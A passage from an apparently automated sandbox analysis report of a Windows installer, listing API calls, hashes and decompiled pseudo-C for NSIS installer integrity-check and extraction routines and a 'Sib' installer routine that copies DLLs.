                                                                                                                  • Part of subcall function 6FEB1050: _DebugHeapAllocator.LIBCPMTD ref: 6FEB10C6
                                                                                                                  • Part of subcall function 6FEB1050: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6FEB10D2
                                                                                                                  • Part of subcall function 6FEB1050: std::ios_base::good.LIBCPMTD ref: 6FEB10DA
                                                                                                                  • Part of subcall function 6FEE1373: CreateDirectoryW.KERNEL32(00000000,6FEB14AA,?,?,?,6FEB14AA,00000000,00000000), ref: 6FEE1381
                                                                                                                  • Part of subcall function 6FEE1373: GetLastError.KERNEL32(?,?,?,6FEB14AA,00000000,00000000), ref: 6FEE138F
                                                                                                                • CopyFileW.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00000000,00000000,6FECF5C0,?,00000001,3A83C854), ref: 6FEA5707
                                                                                                                • CopyFileW.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6FEA5770
                                                                                                                  • Part of subcall function 6FEE1373: CreateDirectoryW.KERNEL32(00000000,6FEB14AA,?,?,?,?,6FEB14AA,00000000,00000000), ref: 6FEE13FF
                                                                                                                  • Part of subcall function 6FEE1373: GetLastError.KERNEL32(?,?,?,?,6FEB14AA,00000000,00000000), ref: 6FEE1409
                                                                                                                • _DebugHeapAllocator.LIBCPMTD ref: 6FEA57F0
                                                                                                                  • Part of subcall function 6FEA3980: _DebugHeapAllocator.LIBCPMTD ref: 6FEA3A15
                                                                                                                  • Part of subcall function 6FEA3980: _DebugHeapAllocator.LIBCPMTD ref: 6FEA3A28
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AllocatorDebugHeap$Base::Concurrency::details::ContextCopyCreateDirectoryErrorFileIdentityLastQueueWork$std::ios_base::good
                                                                                                                • String ID: C:\Users\Operations\Source\Workspaces\Sib\Sibl\SibInstaller\Install.cpp$W7o$[CommonAppDataFolder]\sib\%s$\SibCa.dll$\SibCa.dll$\SibClr.dll$\SibClr.dll$\sib.dat$productCode
                                                                                                                • API String ID: 1853039035-3681276153
                                                                                                                • Opcode ID: 11cedd3b6dbb129f3f490f95d34ab5d39b9dec2de463a7df60b192d61dd6a960
                                                                                                                • Instruction ID: ad9c5d17efaac7f58e8edede073d30f83f0592cbcdd6e80547d6e485a174bbc3
                                                                                                                • Opcode Fuzzy Hash: 11cedd3b6dbb129f3f490f95d34ab5d39b9dec2de463a7df60b192d61dd6a960
                                                                                                                • Instruction Fuzzy Hash: 3F811E70D10309EBDB04DBE8D991BEEBBB9AF44304F20456DE415BB2D0DB366A05CB65
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FEB1050, Relevance: 18.2, APIs: 12, Instructions: 212memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _DebugHeapAllocator.LIBCPMTD ref: 6FEB10C6
                                                                                                                • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6FEB10D2
                                                                                                                • std::ios_base::good.LIBCPMTD ref: 6FEB10DA
                                                                                                                • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6FEB113C
                                                                                                                • _DebugHeapAllocator.LIBCPMTD ref: 6FEB114C
                                                                                                                • _DebugHeapAllocator.LIBCPMTD ref: 6FEB1159
                                                                                                                • _DebugHeapAllocator.LIBCPMTD ref: 6FEB11B0
                                                                                                                • _DebugHeapAllocator.LIBCPMTD ref: 6FEB11C1
                                                                                                                • _DebugHeapAllocator.LIBCPMTD ref: 6FEB11D3
                                                                                                                • _DebugHeapAllocator.LIBCPMTD ref: 6FEB125A
                                                                                                                  • Part of subcall function 6FEA5840: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCONCRTD ref: 6FEA584A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AllocatorDebugHeap$Base::Concurrency::details::ContextIdentityQueueWork$std::ios_base::good
                                                                                                                • String ID:
                                                                                                                • API String ID: 100152506-0
                                                                                                                • Opcode ID: a5ec2f654df87aaa0abca4bd93d3442c55cdc2232b4977b3769e7324a209cc4a
                                                                                                                • Instruction ID: 77f296bf763df1b36894e420f166607d0a797c4282ae7be9e516d265e61d0fb4
                                                                                                                • Opcode Fuzzy Hash: a5ec2f654df87aaa0abca4bd93d3442c55cdc2232b4977b3769e7324a209cc4a
                                                                                                                • Instruction Fuzzy Hash: EB911670C04348DADB04DBE8CA55BEEBFB4AF55308F6081ACD416AF295DB752B09CB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FEDA6D6, Relevance: 18.1, APIs: 12, Instructions: 137memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(0000001C), ref: 6FEDA6E8
                                                                                                                • GlobalAlloc.KERNEL32(00000002,00000000), ref: 6FEDA747
                                                                                                                • GlobalHandle.KERNEL32(00000010), ref: 6FEDA750
                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 6FEDA759
                                                                                                                • GlobalReAlloc.KERNEL32 ref: 6FEDA772
                                                                                                                • GlobalLock.KERNEL32 ref: 6FEDA780
                                                                                                                • LeaveCriticalSection.KERNEL32(0000001C), ref: 6FEDA7C5
                                                                                                                • GlobalHandle.KERNEL32(00000000), ref: 6FEDA7D9
                                                                                                                • GlobalLock.KERNEL32 ref: 6FEDA7E0
                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 6FEDA7E9
                                                                                                                • EnterCriticalSection.KERNEL32(?,00000001,00000000), ref: 6FEDA800
                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 6FEDA82C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Global$CriticalSection$Leave$AllocEnterHandleLock$Unlock
                                                                                                                • String ID:
                                                                                                                • API String ID: 2233717024-0
                                                                                                                • Opcode ID: 4bef64ceb0723bc4fdb8ca6490ead7cdea7b12058ec535e77077c414b4f767f5
                                                                                                                • Instruction ID: 210964fd64833b8310eca384930f263cc3c49f97a237cd9b827eda790e716dc8
                                                                                                                • Opcode Fuzzy Hash: 4bef64ceb0723bc4fdb8ca6490ead7cdea7b12058ec535e77077c414b4f767f5
                                                                                                                • Instruction Fuzzy Hash: 44410531601205EFCB148F28C988B9A7BB9FF85718F24849DF8019B656D7B1E953CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004035B3, Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 99%
                                                                                                                			E004035B3(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _t50;
				void* _t53;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				void* _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				 *0x47eb00 = GetTickCount() + 0x3e8;
				GetModuleFileNameW(0, 0x4eb0d8, 0x2004);
				_t89 = E00405E7C(0x4eb0d8, 0x80000000, 3);
				_v16 = _t89;
				 *0x40c010 = _t89;
				if(_t89 == 0xffffffff) {
					return L"Error launching installer";
				}
				E00406035(0x4db0b8, 0x4eb0d8);
				E00406035(0x4ef0e0, E0040677D(0x4db0b8));
				_t50 = GetFileSize(_t89, 0);
				 *0x43dd38 = _t50;
				_t93 = _t50;
				__eflags = _t50;
				if(_t50 <= 0) {
					L24:
					E004032D2(1);
					__eflags =  *0x47eb0c - _t82;
					if( *0x47eb0c == _t82) {
						goto L36;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						E00403368( *0x47eb0c + 0x1c);
						_t57 = E0040337F(0xffffffff, _t82, _t94, _v24);
						__eflags = _t57 - _v24;
						if(_t57 != _v24) {
							goto L36;
						}
						__eflags = _v44 & 0x00000001;
						 *0x47eabc = _t94;
						 *0x47eb08 =  *_t94;
						if((_v44 & 0x00000001) != 0) {
							 *0x47eb04 =  *0x47eb04 + 1;
							__eflags =  *0x47eb04;
						}
						_t85 = 8;
						_t40 = _t94 + 0x44; // 0x44
						_t59 = _t40;
						do {
							_t59 = _t59 - 8;
							 *_t59 =  *_t59 + _t94;
							_t85 = _t85 - 1;
							__eflags = _t85 - _t82;
						} while (_t85 != _t82);
						_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
						 *(_t94 + 0x3c) = _t60;
						E00405E38(0x47eac0, _t94 + 4, 0x40);
						__eflags = 0;
						return 0;
					}
					E00403368( *0x42c174);
					_t65 = E00403336( &_a4, 4); // executed
					__eflags = _t65;
					if(_t65 == 0) {
						goto L36;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L36;
					}
					goto L28;
				} else {
					do {
						asm("sbb eax, eax");
						_t70 = ( ~( *0x47eb0c) & 0x00007e00) + 0x200;
						_t90 = _t93;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E00403336(0x42c178, _t90); // executed
						__eflags = _t71;
						if(_t71 == 0) {
							E004032D2(1);
							L36:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x47eb0c;
						if( *0x47eb0c != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E004032D2(0);
							}
							goto L20;
						}
						E00405E38( &_v44, 0x42c178, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x42c174; // 0x554f4
						 *0x47eb80 =  *0x47eb80 | _a4 & 0x00000002;
						_t80 = _v20;
						 *0x47eb0c = _t87;
						__eflags = _t80 - _t93;
						if(_t80 > _t93) {
							goto L36;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t24 = _t80 - 4; // 0x40a264
							_t93 = _t24;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x43dd38; // 0x40b308
						if(__eflags < 0) {
							_v12 = E004072AD(_v12, 0x42c178, _t90);
						}
						 *0x42c174 =  *0x42c174 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 > 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}






























                                                                                                                0x004035bb
                                                                                                                0x004035be
                                                                                                                0x004035c1
                                                                                                                0x004035db
                                                                                                                0x004035e0
                                                                                                                0x004035f3
                                                                                                                0x004035f5
                                                                                                                0x004035f8
                                                                                                                0x00403601
                                                                                                                0x00000000
                                                                                                                0x00403603
                                                                                                                0x00403614
                                                                                                                0x00403625
                                                                                                                0x0040362c
                                                                                                                0x00403632
                                                                                                                0x00403637
                                                                                                                0x00403639
                                                                                                                0x0040363b
                                                                                                                0x00403728
                                                                                                                0x0040372a
                                                                                                                0x00403730
                                                                                                                0x00403736
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040373c
                                                                                                                0x0040373f
                                                                                                                0x0040376b
                                                                                                                0x00403770
                                                                                                                0x00403776
                                                                                                                0x00403781
                                                                                                                0x0040378d
                                                                                                                0x00403792
                                                                                                                0x00403795
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00403797
                                                                                                                0x0040379b
                                                                                                                0x004037a3
                                                                                                                0x004037a8
                                                                                                                0x004037aa
                                                                                                                0x004037aa
                                                                                                                0x004037aa
                                                                                                                0x004037b2
                                                                                                                0x004037b3
                                                                                                                0x004037b3
                                                                                                                0x004037b6
                                                                                                                0x004037b6
                                                                                                                0x004037b9
                                                                                                                0x004037bb
                                                                                                                0x004037bc
                                                                                                                0x004037bc
                                                                                                                0x004037c7
                                                                                                                0x004037cd
                                                                                                                0x004037db
                                                                                                                0x004037e0
                                                                                                                0x00000000
                                                                                                                0x004037e0
                                                                                                                0x00403747
                                                                                                                0x00403752
                                                                                                                0x00403757
                                                                                                                0x00403759
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00403762
                                                                                                                0x00403765
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00403641
                                                                                                                0x00403646
                                                                                                                0x0040364d
                                                                                                                0x00403654
                                                                                                                0x00403659
                                                                                                                0x0040365b
                                                                                                                0x0040365d
                                                                                                                0x0040365f
                                                                                                                0x0040365f
                                                                                                                0x00403663
                                                                                                                0x00403668
                                                                                                                0x0040366a
                                                                                                                0x004037eb
                                                                                                                0x004037f1
                                                                                                                0x00000000
                                                                                                                0x004037f1
                                                                                                                0x00403670
                                                                                                                0x00403677
                                                                                                                0x004036f3
                                                                                                                0x004036f7
                                                                                                                0x004036fb
                                                                                                                0x00403700
                                                                                                                0x00000000
                                                                                                                0x004036f7
                                                                                                                0x00403680
                                                                                                                0x00403685
                                                                                                                0x00403688
                                                                                                                0x0040368d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040368f
                                                                                                                0x00403696
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00403698
                                                                                                                0x0040369f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004036a1
                                                                                                                0x004036a8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004036aa
                                                                                                                0x004036b1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004036b3
                                                                                                                0x004036b9
                                                                                                                0x004036c2
                                                                                                                0x004036c8
                                                                                                                0x004036cb
                                                                                                                0x004036d1
                                                                                                                0x004036d3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004036d9
                                                                                                                0x004036dd
                                                                                                                0x004036e5
                                                                                                                0x004036e5
                                                                                                                0x004036e8
                                                                                                                0x004036e8
                                                                                                                0x004036eb
                                                                                                                0x004036ed
                                                                                                                0x004036ef
                                                                                                                0x004036ef
                                                                                                                0x00000000
                                                                                                                0x004036ed
                                                                                                                0x004036df
                                                                                                                0x004036e3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00403701
                                                                                                                0x00403701
                                                                                                                0x00403707
                                                                                                                0x00403713
                                                                                                                0x00403713
                                                                                                                0x00403716
                                                                                                                0x0040371c
                                                                                                                0x0040371e
                                                                                                                0x0040371e
                                                                                                                0x00403726
                                                                                                                0x00403726
                                                                                                                0x00000000
                                                                                                                0x00403726

                                                                                                                APIs
                                                                                                                • GetTickCount.KERNEL32 ref: 004035C4
                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                                                  • Part of subcall function 00405E7C: GetFileAttributesW.KERNEL32(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                  • Part of subcall function 00405E7C: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                                                Strings
                                                                                                                • Inst, xrefs: 00403698
                                                                                                                • Error launching installer, xrefs: 00403603
                                                                                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                                                                • soft, xrefs: 004036A1
                                                                                                                • Null, xrefs: 004036AA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.467867946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.467855294.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467893180.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467913204.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467974514.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.468002709.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                • API String ID: 4283519449-527102705
                                                                                                                • Opcode ID: 60015d4ad0f4b5f5eae55729fc88f45e330dc420916319a7d833a41d7a943f83
                                                                                                                • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                                                                                • Opcode Fuzzy Hash: 60015d4ad0f4b5f5eae55729fc88f45e330dc420916319a7d833a41d7a943f83
                                                                                                                • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040337F, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 175fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 95%
                                                                                                                			E0040337F(int _a4, void* _a8, long _a12, int _a16) {
				struct _OVERLAPPED* _v8;
				long _v12;
				void* _v16;
				long _v20;
				intOrPtr _v24;
				long _v28;
				short _v156;
				void* _t66;
				void* _t68;
				long _t73;
				intOrPtr _t78;
				long _t79;
				void* _t81;
				int _t83;
				void* _t93;
				void* _t100;
				long _t101;
				int _t102;
				long _t103;
				int _t104;
				intOrPtr _t105;
				long _t106;
				void* _t107;

				_t93 = _a12;
				_t102 = _a16;
				_v12 = _t102;
				if(_t93 == 0) {
					_v12 = 0x8000;
				}
				_v8 = 0;
				_v16 = _t93;
				if(_t93 == 0) {
					_v16 = 0x424170;
				}
				_t64 = _a4;
				if(_a4 >= 0) {
					E00403368( *0x47eaf8 + _t64);
				}
				_t66 = E00403336( &_a16, 4); // executed
				if(_t66 != 0) {
					if((_a16 & 0x80000000) == 0) {
						if(_t93 == 0) {
							while(_a16 > 0) {
								_t103 = _v12;
								if(_a16 < _t103) {
									_t103 = _a16;
								}
								if(E00403336(0x420170, _t103) == 0) {
									goto L7;
								}
								if(WriteFile(_a8, 0x420170, _t103,  &_a12, 0) == 0 || _t103 != _a12) {
									L31:
									_push(0xfffffffe);
									goto L8;
								} else {
									_v8 = _v8 + _t103;
									_a16 = _a16 - _t103;
									continue;
								}
							}
							L37:
							return _v8;
						}
						if(_a16 < _t102) {
							_t102 = _a16;
						}
						if(E00403336(_t93, _t102) == 0) {
							goto L7;
						} else {
							_v8 = _t102;
							goto L37;
						}
					}
					_t73 = GetTickCount();
					_t13 =  &_a16;
					 *_t13 = _a16 & 0x7fffffff;
					_v20 = _t73;
					 *0x43dd30 = 0x435d28;
					 *0x43dd2c = 0x435d28;
					 *0x434188 = 8;
					 *0x4346a4 = 0;
					 *0x4346a0 = 0;
					 *0x43dd28 = 0x43dd28;
					_a4 = _a16;
					if( *_t13 <= 0) {
						goto L37;
					} else {
						goto L11;
					}
					while(1) {
						L11:
						_t104 = 0x4000;
						if(_a16 < 0x4000) {
							_t104 = _a16;
						}
						if(E00403336(0x420170, _t104) == 0) {
							goto L7;
						}
						_a16 = _a16 - _t104;
						 *0x434178 = 0x420170;
						 *0x43417c = _t104;
						while(1) {
							_t100 = _v16;
							 *0x434180 = _t100;
							 *0x434184 = _v12;
							_t78 = E004076A0(0x434178);
							_v24 = _t78;
							if(_t78 < 0) {
								break;
							}
							_t105 =  *0x434180; // 0x425ad2
							_t106 = _t105 - _t100;
							_t79 = GetTickCount();
							_t101 = _t79;
							if(( *0x47eb94 & 0x00000001) != 0 && (_t79 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfW( &_v156, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t107 = _t107 + 0xc;
								E00404F9E(0,  &_v156);
								_v20 = _t101;
							}
							if(_t106 == 0) {
								if(_a16 > 0) {
									goto L11;
								}
								goto L37;
							} else {
								if(_a12 != 0) {
									_t81 =  *0x434180; // 0x425ad2
									_v8 = _v8 + _t106;
									_v12 = _v12 - _t106;
									_v16 = _t81;
									L26:
									if(_v24 != 1) {
										continue;
									}
									goto L37;
								}
								_t83 = WriteFile(_a8, _v16, _t106,  &_v28, 0); // executed
								if(_t83 == 0 || _v28 != _t106) {
									goto L31;
								} else {
									_v8 = _v8 + _t106;
									goto L26;
								}
							}
						}
						_push(0xfffffffc);
						goto L8;
					}
					goto L7;
				} else {
					L7:
					_push(0xfffffffd);
					L8:
					_pop(_t68);
					return _t68;
				}
			}


























                                                                                                                0x00403389
                                                                                                                0x0040338d
                                                                                                                0x00403393
                                                                                                                0x00403398
                                                                                                                0x0040339a
                                                                                                                0x0040339a
                                                                                                                0x004033a1
                                                                                                                0x004033a4
                                                                                                                0x004033a9
                                                                                                                0x004033ab
                                                                                                                0x004033ab
                                                                                                                0x004033b2
                                                                                                                0x004033b7
                                                                                                                0x004033c2
                                                                                                                0x004033c2
                                                                                                                0x004033cd
                                                                                                                0x004033d4
                                                                                                                0x004033e5
                                                                                                                0x00403548
                                                                                                                0x004035ac
                                                                                                                0x0040356e
                                                                                                                0x00403574
                                                                                                                0x00403576
                                                                                                                0x00403576
                                                                                                                0x00403587
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040359f
                                                                                                                0x0040353f
                                                                                                                0x0040353f
                                                                                                                0x00000000
                                                                                                                0x004035a6
                                                                                                                0x004035a6
                                                                                                                0x004035a9
                                                                                                                0x00000000
                                                                                                                0x004035a9
                                                                                                                0x0040359f
                                                                                                                0x00403564
                                                                                                                0x00000000
                                                                                                                0x00403564
                                                                                                                0x0040354d
                                                                                                                0x0040354f
                                                                                                                0x0040354f
                                                                                                                0x0040355b
                                                                                                                0x00000000
                                                                                                                0x00403561
                                                                                                                0x00403561
                                                                                                                0x00000000
                                                                                                                0x00403561
                                                                                                                0x0040355b
                                                                                                                0x004033f1
                                                                                                                0x004033f3
                                                                                                                0x004033f3
                                                                                                                0x004033fa
                                                                                                                0x00403402
                                                                                                                0x00403407
                                                                                                                0x0040340f
                                                                                                                0x00403419
                                                                                                                0x0040341f
                                                                                                                0x00403425
                                                                                                                0x0040342f
                                                                                                                0x00403432
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00403438
                                                                                                                0x00403438
                                                                                                                0x00403438
                                                                                                                0x00403440
                                                                                                                0x00403442
                                                                                                                0x00403442
                                                                                                                0x00403453
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00403455
                                                                                                                0x00403458
                                                                                                                0x0040345e
                                                                                                                0x00403464
                                                                                                                0x00403467
                                                                                                                0x0040346f
                                                                                                                0x00403475
                                                                                                                0x0040347a
                                                                                                                0x0040347f
                                                                                                                0x00403484
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040348a
                                                                                                                0x00403490
                                                                                                                0x00403492
                                                                                                                0x0040349b
                                                                                                                0x0040349d
                                                                                                                0x004034ce
                                                                                                                0x004034d4
                                                                                                                0x004034e0
                                                                                                                0x004034e5
                                                                                                                0x004034e5
                                                                                                                0x004034ec
                                                                                                                0x00403530
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004034ee
                                                                                                                0x004034f1
                                                                                                                0x00403513
                                                                                                                0x00403518
                                                                                                                0x0040351b
                                                                                                                0x0040351e
                                                                                                                0x00403521
                                                                                                                0x00403525
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040352b
                                                                                                                0x004034ff
                                                                                                                0x00403507
                                                                                                                0x00000000
                                                                                                                0x0040350e
                                                                                                                0x0040350e
                                                                                                                0x00000000
                                                                                                                0x0040350e
                                                                                                                0x00403507
                                                                                                                0x004034ec
                                                                                                                0x00403538
                                                                                                                0x00000000
                                                                                                                0x00403538
                                                                                                                0x00000000
                                                                                                                0x004033d6
                                                                                                                0x004033d6
                                                                                                                0x004033d6
                                                                                                                0x004033d8
                                                                                                                0x004033d8
                                                                                                                0x00000000
                                                                                                                0x004033d8

                                                                                                                APIs
                                                                                                                • GetTickCount.KERNEL32 ref: 004033F1
                                                                                                                • GetTickCount.KERNEL32 ref: 00403492
                                                                                                                • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                                                • wsprintfW.USER32 ref: 004034CE
                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00425AD2,00403792,00000000), ref: 004034FF
                                                                                                                • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.467867946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.467855294.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467893180.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467913204.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467974514.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.468002709.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CountFileTickWrite$wsprintf
                                                                                                                • String ID: (]C$... %d%%$pAB
                                                                                                                • API String ID: 651206458-3635341587
                                                                                                                • Opcode ID: cb4c91118d633cdc657fe6c8c56820a3b26f1ee58aa4180b17ceb2c9431ae53d
                                                                                                                • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                                                                                • Opcode Fuzzy Hash: cb4c91118d633cdc657fe6c8c56820a3b26f1ee58aa4180b17ceb2c9431ae53d
                                                                                                                • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FEA9B60, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 168memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
